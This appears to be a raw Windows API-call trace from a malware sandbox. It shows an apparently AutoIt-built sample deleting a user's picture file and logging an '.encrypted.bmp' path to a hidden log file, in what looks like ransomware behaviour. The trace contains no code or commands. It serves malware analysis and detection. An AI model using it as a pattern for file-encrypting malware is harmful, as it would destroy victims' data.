PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.683] CharLowerBuffW (in: lpsz="byte[58541]", cchLength=0xb | out: lpsz="byte[58541]") returned 0xb [0040.683] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.684] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.684] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.684] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.684] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.684] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.684] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.685] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.685] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\d_o37vi.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.686] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.686] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.686] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.686] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.686] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.687] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.687] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.687] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.687] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.687] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFilePart=0x0) returned 0x37 [0040.688] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0x17f50680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0x7c2240 [0040.688] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\d_o37vi.bmp")) returned 1 [0040.689] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee1130, ftCreationTime.dwHighDateTime=0x1d5c22e, ftLastAccessTime.dwLowDateTime=0xff7d9b90, ftLastAccessTime.dwHighDateTime=0x1d5bf92, ftLastWriteTime.dwLowDateTime=0x17f50680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xe4ad, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="D_O37vI.bmp", cAlternateFileName="")) returned 0 [0040.689] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.689] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.691] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.691] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.692] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.692] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.692] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.692] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.692] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.692] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0040.692] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.693] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.693] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.693] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.694] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.694] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2e92, lpOverlapped=0x0) returned 1 [0040.694] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.694] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2e92, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.695] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.encrypted.bmp\r\n", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0040.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.encrypted.bmp\r\n", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\D_O37vI.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 68 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0040.695] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x43, lpOverlapped=0x0) returned 1 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.695] CloseHandle (hObject=0x128) returned 1 [0040.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.697] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.697] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0040.698] 